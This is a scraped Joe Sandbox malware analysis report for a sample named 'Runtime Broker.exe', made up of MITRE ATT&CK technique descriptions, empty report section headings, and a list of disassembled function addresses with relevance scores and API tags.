Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.
Tactics:	Impact
Data Sources:	Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report Runtime Broker.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Overview

Sigma Overview

Jbx Signature Overview

AV Detection:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

Contacted IPs

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Network Port Distribution

UDP Packets

DNS Queries

DNS Answers

Code Manipulations

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

System Behavior

Analysis Process: Runtime Broker.exe PID: 1848 Parent PID: 6580

General

Function 004035D8, Relevance: 86.2, APIs: 32, Strings: 17, Instructions: 410
stringfilecomCOMMON

Function 00406C5B, Relevance: 5.4, APIs: 4, Instructions: 382
COMMONCrypto

Function 0040689A, Relevance: 3.0, APIs: 2, Instructions: 14
fileCOMMON

Function 00403C0B, Relevance: 49.2, APIs: 14, Strings: 14, Instructions: 215
stringregistryCOMMON

Function 00403068, Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 204
memoryCOMMON

Function 00406579, Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 209
stringCOMMON

Function 0040176F, Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 145
stringtimeCOMMON

Function 00403411, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 101
COMMON

Function 004068C1, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Function 00406AAC, Relevance: 9.2, APIs: 4, Strings: 2, Instructions: 198
COMMON

Function 00406061, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 37
COMMON

Function 00403309, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88
COMMON

Function 004015C1, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65
COMMON

Function 0040640A, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44
registryCOMMON

Function 004060B5, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22
fileCOMMON

Function 00407090, Relevance: 5.2, APIs: 4, Instructions: 236
COMMON

Function 00407291, Relevance: 5.2, APIs: 4, Instructions: 208
COMMON

Function 00406FA7, Relevance: 5.2, APIs: 4, Instructions: 205
COMMON

Function 00406EFA, Relevance: 5.2, APIs: 4, Instructions: 180
COMMON

Function 00407018, Relevance: 5.2, APIs: 4, Instructions: 170
COMMON

Function 00406F64, Relevance: 5.2, APIs: 4, Instructions: 168
COMMON

Function 004060E4, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22
fileCOMMON

Function 00401389, Relevance: 3.0, APIs: 2, Instructions: 43
windowCOMMON

Function 00406931, Relevance: 3.0, APIs: 2, Instructions: 22
libraryloaderCOMMON

Function 00406032, Relevance: 3.0, APIs: 2, Instructions: 16
fileCOMMON

Function 00405AF0, Relevance: 3.0, APIs: 2, Instructions: 9
COMMON

Function 004063A9, Relevance: 1.5, APIs: 1, Instructions: 19
registryCOMMON

Function 00403590, Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Function 004056E3, Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 284
windowclipboardmemoryCOMMON

Function 00404983, Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 275
stringCOMMON

Function 00405C4E, Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 148
filestringCOMMON

Function 004021A2, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129
comCOMMON

Function 00402902, Relevance: 1.5, APIs: 1, Instructions: 30
fileCOMMON

Function 00404EFF, Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 490
windowmemoryCOMMON

Function 00403FB9, Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 346
windowstringCOMMON

Function 00404651, Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 204
windowstringCOMMON

Function 00406188, Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 130
memorystringCOMMON

Function 00401000, Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125
COMMON

Function 004055A4, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72
stringwindowCOMMON

Function 004067EB, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69
COMMON

Function 004044F9, Relevance: 12.1, APIs: 8, Instructions: 68
COMMON

Function 004026E4, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153
fileCOMMON

Function 00402FC6, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51
COMMON

Function 00404E4D, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48
windowCOMMON

Function 00405A73, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39
COMMON

Function 00402F2B, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36
timeCOMMON

Function 00402947, Relevance: 9.1, APIs: 6, Instructions: 86
memoryfileCOMMON